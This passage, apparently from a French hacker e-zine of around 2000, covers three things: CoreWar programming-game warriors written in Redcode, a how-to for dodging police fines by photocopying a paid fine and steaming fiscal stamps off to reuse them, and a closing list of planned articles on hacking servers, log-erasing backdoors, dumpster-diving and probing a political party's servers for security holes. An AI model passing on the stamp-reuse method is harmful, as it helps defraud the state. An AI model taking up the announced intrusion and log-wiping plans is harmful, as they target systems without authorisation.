Analyse : le Radar commence par mov #1 -100, c'est à dire que la centième case avant celle-ci est devenue DAT 1, cette case est un "piège". Ensuite il ajoute 19 à la valeur de la 14ème case après celle de l'instruction, c'est à dire que le DAT -16 devient DAT 3, puis il met la valeur 0 (donc DAT 0) sur la case indiquée par la valeur de la case précédement modifiée (l'ex DAT -16). Ensuite il verf=ifie que le "piège" n'a pas bougé puis il recommence à la ligne add #19 14 (c'est un système de boucle). Dès qu'un IMP est trop près, la case piégée est modifiée, le Radar entre en phase 2. Durant celle-ci, il met en place une copie du programme dans la memoire, cette copie est placée un peu au dessus de la position de l'ex-case piégée. Une fois la copie terminée, il saute directement sur la copie et reprend son activité.
En clais, le Radar guette l'arrivée de l'IMP. Tant qu'il ne s'approche pas, le Radar bombarde la mémoire en espérant tomber par hasard sur la case de l'IMP, probabilité faible. Dès que l'IMP est trop près, le Radar se met ailleurs et recommence son bombardement.
Le problème, c'est qu'en bombardant tout à tord et à travers, le Radar, finit par se toucher li même et à s'auto-détruire. Cette solution est efficace de temps en temps, mais pas à 100%, contrairement au soldat que voici :
Deuxième solution : l'AntIMP
Source
jmp 2
jmp 23
mov -1 -3
mov -2 -5
mov -3 -7
mov -4 -9
mov -5 -11
mov -6 -13
mov -7 -15
mov -8 -17
mov -9 -19
mov -10 -21
jmp -10
Le programme ne fait rien d'autre que de pieger les 10 cases qui sont avant. S'il est probable, qu'il echappe aux deux premières, il est statistiquement peu probable que l'IMP depasse la quatrième, et mathématiquement impossible qu'il echappe aux six premieres cases.
Dès qu'il tombe sur une case piégée, l'IMP saute de 23 cases, là où l'attend une commande DAT, et hop il a perdu.
Il existe d'autres soldats, mais le mieux est de les programmer soi même, ce n'est pas si dur si on suit un plan ordonné, et si on connait un peu l'assembleur. Ensuite faites donc des concours avec vos amis pour voir qui survit, ou cherchez donc à faire un soldat qui détruise un soldat spécifique (comme l'AntIMP). Mais n'oubliez pas, plus votre soldat est complet et comporte d'instructions, plus il est lent par rapport au programme adverse. Le soldat parfait n'existe pas.
Bon j'espere que cet article vous aura décidé de vous mettre au sport du CoreWar. J'ai essayé d'être le plus clair possible mais c'est vraiment pas simple, ni de comprendre, ni d'expliquer. Envoyez moi les sources vos créations (par e-mail, ou alors je suis souvent sur l'IRC neoserv), je fais la collection de soldats, et puis j'essayerai de faire un soldat qui détruise le votre. Ahalala quel bon jeu.
(Nd Ad-Tonnou ---> 'sont fous ces ricains...)
Tun!Z 2000
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pas Payer Ses Amendes 720
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
********************************************************
** COMMENT NE PAS PAYER UNE AMENDES DE FLICS 2 FOIS?? **
********************************************************
Tout d'abbord je vais vous raconter comment nous avons du avoir recours a cette technique: moi (7 20) et ad-tonnou étions tranquillement sur un scooter (Nd Ad-tonnou --> le mien) entrain de revenir du lycée tranquillement sauf que moi j'avais pas de casque (c est con hein), on étais donc tranquille, les cours finis donc heureux!! et a un carrefour j'aperçois une clio bleu!!
"eh ad j'ai vu une clio bleu làs bas...!"
"hein t'es pas drole 7 20 (prononcé sept vingt) mais si je te jure!!"
"pffff..."
et là : pin pon pin pon pin pon putain accelere accelere y nous course (manque de chance on etais dans une montée avec son vieux scoot pourrie on est pas allé loin :-((donc on se fait choper (y nous on pas grillé pour le delit de fuite)) par deux gros bof en uniforme, résultat: 600 F d amende!! :-(((((((((((((((((((((((((((((((((((((
Bref dégouté surtout que de ne pas mettre de casque n'engage que nous on ne fait courrir de risques a personne merde!
Encore une loi débile mais bon c'est un moyen comme un autre de nous pomper du fric (il est drole l etat, il veut notre sécurité mais il nous la fait payer il est si attentionné, il est gentil l'etat hien??)
Bon la technique ne marche que pour une amende déjà payé mais la deuxième on la paye pas!! (ni le 3eme, la 4eme etc...)quand on a une amende on doit la payer avec un timbre special que l'on achete dans les tabacs..
On a en fait un gros timbre que l'on envoie avec l'amende et un petit que l'on garde comme preuve de paiement sur un talon:
(ND AD --> Schema manquant, 720 est parti en vacance et son ascii est mal passé, encore une fois désolés...)
bon vous savez maintenant a quoi ressemble une amende...donc voila ce que vous devez faire avec la première amende: vous ne coller pas le gros timbre mais vous le posez sur l amende et vous faite une photocopie comme ça ni vu ni connue, vous gardez la photocop et vous planker l amende ainsi que le gros timbre (vous le garder pour une prochaine amende quoi) bon maintenant vous coller avec pas trop de salive le petit timbre sur le reçut normal quoi.. puis vous faite rien: soit personne ne va rien vous demander soit les flics vont venir ou vous envoyer une amende plus grosse!!vous vous plaignez vous leur montrer la photocop et le talon et il pourrons rien dire...
Ohlala ! La poste c'est nul ca perd tout le temps du courrier !!!(surtout les amendes qu'on estcensé envoyer)
Donc vous avez paye mais si vous avez une deuxieme amende du meme prix vous payé pas!!alors vous décoller le petit timbre a la vapeur (facile) et vous pouver payer l amende tranquillement......
CA MARCHE on l a fait.. avec ad (Nd ad ---> c moi :)) car on avait déjà eut une autre amende avant!!! :-))(le seul truc c est qu il faut pas que les flics relevent le numero de serie du petit timbresinon vous pouver vous faire grillé car si ils voient que le timbre à été utilisé 2 foisils vont se poser des question (remarque je sais pas tellement y sont cons :-)))(Nd ad-tonnou ---> on l'a fait et vous riskez qu'une amende plus grosse...nous on a économisé 600 balles comme cela...)
=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=
Le Mot De La Fin Ad-Tonnou
=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=
Voila, c'est fini...
Biensur j'espere que vous aurez aprecie ce mag et les articles le composant...
Le #2 est prevu pour dans un mois, on l'a deja commencé:
Pour ma part ---> Deux autre tutoriaux sur le turbo pascal, on passe a la vitesse superieure...
La suite de l'article sur le TCP/IP, comparaison du modele OSI et du DoD
Sauron ---------> Un article sur Linux, pour changer.. :-)
Je crois que j'ai un article sur la programmation en cours...
On a prevu pas mal d'autres articles:
--> moi je veux ouvrir un dossier sur le paranormal, le mois prochain je vais soit etudie pour vous l'affaire de
Roswellet ce qu'on nous cache ou bien le phenomene des monsieurs tout noirs et pas beaux, j'ai nomme les MIB, men
in black (pas ceux du film, les vrais)
--> on va aussi se concentrer sur le hacking/Linux : ou et comment trouver des shells, la suite de l'article de
Sauron (tres petit mais fait au dernier moment)
--> on vous hack aussi minimum 5 servers, avec explications a l'appui pour se faire pardonner du manque de haclking
dans ce mag
--> Trashing Reports...ca vous rapelle rien ??? c'est une rubrique qui fut a la base cree par le mag Cryptel...720 et
moi on a repere de jolies poubelles FT avec seulement 5 groupes de 3 sentinelles + des chiens + barrieres
electriques...
Du gateau quoi... ;-)
--> peut etre une autre backdoor (script shell) a foutre sur vos shells pour effacer les logs...
--> Un dossier sur la triangulation et les autres techniques de tracage des portables...
--> configuration d'une connexion ppp sous nux
--> Info about FN...j'ai repere pas mal de servers du FN...on va organiser une collecte d'infos a propos de ces sites
( security holes, OS, users...)
Et beaucoup d'autres encore...
J'attends biensur vos commentaires a propos de ce premier essai de zine...
Je vous garantie un #2 encore meilleur...
--== ALLIANX ==--
Pour nous joindre...
Chan de la team --> server: irc.irc2k.net chan: #allianX
Ad-Tonnou --> 0800 010 800...bal 4540.....vous appelez, quand la dame parle, appuyez sur 9, puis *, puis 4540 (en dehors
des heures de buro) (c'est gratuit)
Redfire --> redfire@ifrance.com
720 --> Vleyrit@yahoo.fr (ne me demandez pas pourquoi ce mail, j'ai jamais compris)
Tun!z2000 --> Tuniz2000@yahoo.com
Sauron --> Humour@humour.com
FT-One --> ft_one@meloo.com
[-ahfeelinux] --> ahfeelinux@caramail.com
Merci a ceux qui nous ont motives pour ce zine...et merci a vous de nous lire...